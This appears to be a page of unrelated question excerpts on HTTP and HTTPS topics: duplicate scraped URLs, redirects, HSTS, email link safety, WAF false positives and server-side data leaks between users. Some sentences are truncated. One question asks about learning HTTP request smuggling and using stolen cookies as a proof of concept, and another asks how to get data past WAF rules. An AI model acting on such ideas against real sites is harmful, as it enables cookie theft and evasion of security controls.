When I use the Python package
newspaper3k package and run the code
import newspaper paper = newspaper.build('http://abcnews.com', memoize_articles=False) for url in paper.article_urls(): print(url)
I get a list of URLs for articles that I can download, in which both these URLs exist
As can be seen, the only difference between the two URLs is the
The question is, can the webpage content differ simply because an
s is added to
http? If I scrape a news source (in this case http://abcnews.com), do I need to download both articles to be sure I don’t miss any article, or are they guaranteed to have the same content so that I can download only one of them?
I have also noticed that some URLs also are duplicated by adding
www. after the
https://). I have the same question here: Can this small change cause the webpage content to differ, and is this something I should take into account or can I simply ignore one of these two URLs?
What I need to do is redirect only some of the sites in my multisite installation to use HTTP instead of HTTPS. Currently my setup has been so that every site redirects to HTTPS but I can’t seem to figure out how to force only some sites to go over HTTP. How would I achieve this?
I am currently trying to learn HTTP Request Smuggling vulnerability to furthermore enhance my pen testing skill. I have watched a couple of videos on Youtube and read articles online regarding it but still have a couple of questions in mind. Question:
- What are the attack vectors of HTTP Req Smuggling (Where should I look)?
- What is the main way to provide PoC to companies with high traffic? I know that HTTP Smuggling could possibly steal people’s cookie, can this be used for the PoC or is this illegal?
- Can this or other vulnerability be chained together? (e.g. self-xss & csrf)
Thank you everyone!
The service starts fine, the request is recorded in the mitmf console but the http site is not loaded. While, https sites load but requests are not recorded in the console.
Before the invention of HSTS security policy, if a user didn’t specify the protocol in the URL, were all the initial requests sent over HTTP by default for every website?
I’m terrified of clicking on links in emails, and yet a colleague insists I do.
When I receive an email in my gmail account that contains links of the form
http://gofile.me/xxxxx/yyyyyyyyy along with its password, apparently sent from someone I know and expect it from, and who has supplied the password for the link to their NAS right next to it, should I try to overcome my fear of clicking on links in emails and consider clicking on it as at least fairly safe? Should I instead copy it paste it in a new tab?
The idea is that the document is evolving so the link will provide the latest version, but should I insist the colleague email me the document directly?
tl;dr: Should I
- click url
- copy/paste url in new tab
- balk, request document be emailed each time
If possible, can an answer be written in simple language?
Cropped, blanked out screenshot from email I received in my gmail:
I’m working on securing an application that receives SQL and HTML-like information that is actually proprietry formulas in some cases, and parts of XML documents in other cases.
So the WAF thinks some HTTP requests are SQL or HTML injection attacks while they actually aren’t.
So how can I send these formulas and XML informaiton without triggering those WAF rules? I tried encoding the data but that didn’t work.
I use localhost for learning more coding, and I keep wondering the same question over and over again when I use Node.js:
Is it really safe?
Many, many people might have asked this. I would naturally want to put SSL HTTPS encryption on it, but there isn’t really anywhere you can get it, even if it may be a bit overkill.
It feels like there should and could be some "protection" or "encryption" type package for npm or something.
I haven’t used Node.js or localhost it for sensitive information, but should I be worrying about this?
I checked established connections with "netstat" command in command prompt, and I found that there are some connections with ip’s of microsoft (I checked ip online) that have http (and not https) connection established, they bring to some svchost.exe in a Win32 folder of the system. I know that http connections are not safe, but I guess they are safe since they have microsoft ip, but why these connections are not encrypted (http)? Is it normal?
We recently added a feature that used a library whose API we misunderstood. Long story short, if user A sends a request to our web application, the library caches some result, and that result may show in a response to user B’s request. Needless to say, this is a security bug, specifically, data from user A leaks to user B.
Although it is well-known that web application should be stateless, the long dependency graph of such application makes the likelihood of some downstream library (or its bad usage) accidentally leaking data between requests non-zero. I can imagine this bug is possible with a wide range of web frameworks and environments (e.g., Django, .NET, NodeJS, AWS Lambda), since they all reuse the application between request to avoid cold starts.
What is the proper term for data leaking server-side between HTTP requests, due to an honest developer mistake? Terms such as session hijacking and session fixation seem to refer exclusively to malicious attacks.
Are there tools and method to test for such mistakes or detect them in production?